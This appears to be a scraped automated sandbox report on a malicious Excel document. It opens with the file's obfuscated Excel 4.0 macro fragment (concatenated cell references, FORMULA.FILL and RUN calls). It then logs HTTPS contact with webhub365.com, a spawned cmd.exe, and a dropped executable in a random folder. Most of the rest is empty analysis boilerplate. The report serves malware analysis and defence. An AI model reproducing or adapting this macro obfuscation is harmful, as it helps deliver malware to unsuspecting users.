$N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $W$367,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($K$351),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $Y$71,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($I$385),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,,,,,,,,,t,,,,,,,,,,,,,,,,,,,,,,,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,q,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,I,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $D$167,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($R$247),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 00:01:02.782792091 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.840646982 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.840765953 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.850260973 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.906337976 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.907385111 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.907407999 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.907428980 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.907445908 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.907556057 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.909708023 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.911695957 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.911792994 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.933043003 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:02.994394064 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:02.994493008 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:04.609034061 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:01:04.707235098 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:04.792618036 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:01:04.792836905 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:02:19.796137094 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:02:19.796156883 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:02:19.796312094 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:02:19.796360016 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:03:02.591763020 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:03:02.591799974 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
Jun 11, 2021 00:03:02.649141073 CEST | 443 | 49167 | 198.244.146.96 | 192.168.2.22 |
Jun 11, 2021 00:03:02.649348021 CEST | 49167 | 443 | 192.168.2.22 | 198.244.146.96 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 00:01:02.692508936 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jun 11, 2021 00:01:02.758696079 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jun 11, 2021 00:01:03.308579922 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jun 11, 2021 00:01:03.360682964 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jun 11, 2021 00:01:03.372205019 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jun 11, 2021 00:01:03.423459053 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jun 11, 2021 00:01:04.013695955 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jun 11, 2021 00:01:04.068691969 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jun 11, 2021 00:01:04.076139927 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jun 11, 2021 00:01:04.139476061 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 11, 2021 00:01:02.692508936 CEST | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 11, 2021 00:01:02.758696079 CEST | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | 198.244.146.96 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 11, 2021 00:01:02.911695957 CEST | 198.244.146.96 | 443 | 192.168.2.22 | 49167 | CN=webhub365.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Tue Jun 08 19:53:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Mon Sep 06 19:53:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 00:00:38 |
Start date: | 11/06/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f660000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 00:00:43 |
Start date: | 11/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4a6e0000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 00:00:45 |
Start date: | 11/06/2021 |
Path: | C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x3a0000 |
File size: | 25600 bytes |
MD5 hash: | 7F7F391491C315A4A72EFCAC0D34FA93 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: | |
Reputation: | low |
Disassembly |
---|
Code Analysis |
---|
Execution Graph |
---|
Execution Coverage: | 8% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 6.2% |
Total number of Nodes: | 340 |
Total number of Limit Nodes: | 6 |
Graph
Callgraph |
---|
Executed Functions |
---|
Function 003A230E, Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 146libraryloaderCOMMON
Control-flow Graph |
---|
C-Code - Quality: 87% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A4BBA, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
Control-flow Graph |
---|
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A490B, Relevance: 12.1, APIs: 8, Instructions: 96sleepCOMMON
Control-flow Graph |
---|
C-Code - Quality: 50% |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A31C6, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON
Control-flow Graph |
---|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Control-flow Graph |
---|
C-Code - Quality: 100% |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A4F4C, Relevance: 6.0, APIs: 4, Instructions: 13COMMON
C-Code - Quality: 100% |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A47E2, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
C-Code - Quality: 100% |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A389C, Relevance: 59.6, APIs: 18, Strings: 16, Instructions: 142COMMON
Control-flow Graph |
---|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A2D9C, Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 172stringCOMMON
Control-flow Graph |
---|
C-Code - Quality: 73% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A3047, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 112filelibraryCOMMON
Control-flow Graph |
---|
C-Code - Quality: 37% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
---|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A3772, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84registryCOMMON
Control-flow Graph |
---|
C-Code - Quality: 75% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
---|
C-Code - Quality: 98% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A35EE, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
Control-flow Graph |
---|
C-Code - Quality: 96% |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
---|
C-Code - Quality: 96% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph |
---|
C-Code - Quality: 36% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A3528, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61fileCOMMON
Control-flow Graph |
---|
C-Code - Quality: 95% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A3472, Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
C-Code - Quality: 94% |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 003A480D, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
C-Code - Quality: 100% |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 98% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |